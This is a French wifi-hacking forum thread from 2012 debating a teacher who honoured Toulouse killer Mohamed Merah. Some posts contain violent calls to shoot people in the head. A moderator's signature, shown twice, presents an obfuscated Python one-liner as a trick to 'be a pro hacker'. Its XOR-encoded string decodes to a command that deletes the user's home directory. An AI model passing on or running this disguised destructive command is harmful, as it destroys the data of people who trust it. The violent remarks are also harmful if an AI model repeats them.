Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-03-2012 21:12:37

M1ck3y
Administrateur
Lieu : Lost in the darkness

[Tuerie de Toulouse] L'enseignante qui n'avait rien dans le crane

Je me demande juste comment cela est humainement possible: Une enseignante suspendue pour avoir rendu hommage à Merah?

Quand on est en charge de l'éducation de nos jeunes, comment peut on etre à ce point débile? Non mais sérieusement cette idiote n'a rien à faire dans l'enseignement. Ca me révolte un comportement pareil. Cautionner et vouloir rendre hommage à une ordure qui a assassiné des enfants! Mais foutez lui des claques bordel!!! pam

C'était mon coup de gueule du jour.

Si vous voulez vous exprimer là dessus, sur l'actualité ou sur la campagne présidentielle, n'hésitez pas. Ici pas de censure.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-03-2012 21:45:06

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : [Tuerie de Toulouse] L'enseignante qui n'avait rien dans le crane

Bon, ce n'est pas très fin de sa part. Après allait elle bien psychologiquement ? On ne sait pas ...

Le détail qui sauve un peu la face est que la plus part des élèves ont quittés la salle. Comme quoi, la désobéissance citoyenne existe encore.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 24-03-2012 08:59:39

toto
Membre V.I.P.
Lieu : chez le docteur aussi

Je n'aime pas la politique ni en débattre, car je m'en fous tous simplement mais ...
Il fut un temps ou l'on aurais arrêter Merah nourris en prison, défendu bref on lui aurais trouver un boulot a sa sortie de prison en lui disant surtout tu recommence pas ...
Pour joindre politique et ce fait si le gouvernement venais a changer, je regretterais ce coté que tous nous voulions tous... ne pas discuter avec ceux qui s'en prennent a des innocents et de surcroit des enfants, une balle dans la tête et basta !

#4 24-03-2012 14:45:22

koala
Membre d'honneur
Lieu : In the sky

La prof en question devait etre une de ses ex, sérieux c'est telement con et stupide comme réaction que ça sent le poisson d'avril a l'avance lol

#5 24-03-2012 20:51:23

Boofku
Membre Actif

Toto, ça c'est pas vraiment passé comme ça hein.

On l'a quand même laissé achter un arcenal et faire ses stages en Afganistan et Pakistan.

Par prévention on devrait tous leur tirer une balle ds la tête.

#6 25-03-2012 10:15:24

Squaks
Membre Irremplaçable

Boofku a écrit :

Par prévention on devrait tous leur tirer une balle ds la tête.

leur ? De qui parles tu ?

Sharkoff

#7 25-03-2012 10:30:42

Boofku
Membre Actif

Perdu, c'était de l'humour. Un peu noir.

#8 26-03-2012 12:45:42

algerino
Membre d'Or

Je suis tout a fait d'accord avec toi Mick3y, le peuple français condamne cet acte ignoble et injuste mais il faut savoir aussi que lorsque 3 militaires ont été tués (des maghrébins) on les ignore, pourquoi?  tandis que si c' est un juif qui meurt on en fait tout un débat? (minute de silence, déplacement d'allain juppé en israel...) il faut se poser des questions et réfléchir à la situation et non pas être naïf et tout croire à ceux que raconte les médias et politiciens.

nb : je rajoute également qu'il nous faut pas oublié ceux que font les israéliens aux peuples palestiniens, massacres, génocide? où va le monde? les droits des peuples palestiniens ne sont pas reconnu ! mad

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#9 26-03-2012 17:48:21

spawn
Modérateur

tibet - syrie - lybie - corée du nord - cuba - angola - toulouse - tchétchénie - ossétie - géorgie - sénégal - tunisie - égypte - pakistan - brésil

cherchez l'intrus.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#10 26-03-2012 20:25:45

Boofku
Membre Actif

T'as l'air super objectif algerino, c'est dingue.

Je te garantie qu'on aurait eu droit au même cinéma s'il avait butté des petits enfants catho dans une école.

#11 27-03-2012 07:25:38

kcdtv
Membre d'honneur
Lieu : Internacionaluña

En ce moment j'écoute sur france inter "les conséquences sur les présidentielles". Résultat : il n'y a pas de changements significatifs ( plus 1 pour Le Pen et Mélanchon, moins 1 pour Bayrou, idem sarko,  moins 0,5 à Hollande)
Et il n'y a pas de changements dans les l'ordre des préoccupations principales pour cette élection: Les problématiques liées au chômage et à la perte du pouvoir d'achat restent au premier plan devant celle liées à la thématique de la "sécurité".
Je trouve que c'est une nouvelle positive.
Que le geste d'un meurtrier (peu importe qu'il soit jaune, vert ou rose à poids rouge, agnostique, boudhiste ou sataniste - on parle là de dégommer avec un calibre des mômes!) n'efface pas des esprits des données comme 35 pour cent de chômage en plus sous le règne sarko et que le bonus pour l'extrême droite soit le moindre possible...

#12 27-03-2012 11:55:42

M1ck3y
Administrateur
Lieu : Lost in the darkness

Il ne faut pas sombrer dans la polémique et le communautarisme. Ce connard a d'abord assassiné des soldats qui n'avaient rien demandé, avant de commettre des crimes atroces: il a tué des enfants. Il aurait été préférable qu'il soit capturé vivant, non pas pour s'expliquer sur son crime car rien ne peut justifier des meurtres d'enfants, mais pour etre jugé et emprisonné. Il a choisi la mort, si il avait voulu rester en vie il n'avait qu'à rester tranquille au lieu de commettre tous ces meurtres, non? Quand il a abattu les militaires, c'était déja une affaire grave prise très au sérieux. Le fait qu'il s'agisse d'enfants de confession juive, chrétienne, boudhiste ou ce que tu veux ne change rien au fond. La seule différence c'est que certains politiques en profitent pour se faire un peu de promo au passage en venant défendre telle ou telle vision communautariste ou non, au lieu de se la boucler et de respecter la mémoire de ces enfants et la douleur des familles. C'est ça qui est grave.

Quelle que soient vos origines et votre religion, pensez vous qu'on puisse admettre qu'un gars se pointe dans une école et abatte des enfants? Et si il s'agissait de vos enfants, vous iriez chercher à comprendre son geste ou bien trouver des explications psycho socio politico religieuses? Non vous auriez juste envie de le tuer de vos mains.

On ne s'attaque pas à des enfants, et on ne prend pas la défense d'un assassin qui a descendu des enfants de sang froid, un point c'est tout. Il faut vraiment etre la dernière des ordures immondes et abjectes puantes et ignobles pour faire ce qu'il a fait. Chercher à comprendre son acte, c'est déja entrer dans son jeu et vouloir lui donner des excuses. Il n'en a aucune.

#13 28-03-2012 04:22:53

koala
Membre d'honneur
Lieu : In the sky

Chercher à comprendre son acte, c'est déja entrer dans son jeu et vouloir lui donner des excuses. Il n'en a aucune.

Effectivement je suis d'accord , le problème c'est que vue le matraquage médiatique abusif que ça a fait il risque d'avoir d'autres merah dans les mois prochains.C'est trop médiatisé est on leur donne trop de "valeur" d'une certaine manière.Ces gens la se considèrent comme des martyrs et tout ce bruit autour de l'affaire ne leur fait que de la pub...

Tout ça car des éléctions approchent et qu'il faut donner bonne apparence.Cette histoire  de meutre lié aux étranger et a la sécurité va influencer les gens dans les urnes et fausser les votes c'est pas bon du tout.

#14 28-03-2012 07:14:55

spawn
Modérateur

Boaf, j'ai lu une étude (donc c'est pas fiable comme info mais ça suffit pour causer smile) qui dit que les changementzs d'intentions de vote sont inférieurs aux marges d'erreurs des sondages.
Ah, et j'ai lu sur twitter que nos amis du canon à ions à orbite basse pulvériseront quiconque diffuse la vidéo.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#15 14-05-2012 15:01:40

sardineeMule
Membre Irremplaçable
Site Web

Moi je dis celui qui a commis ses crimes est une ordure qui que se soit mais pour Merah faut attendre encore un peut et les langues vont se délier.
Trops de zones d'ombres. smile

title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]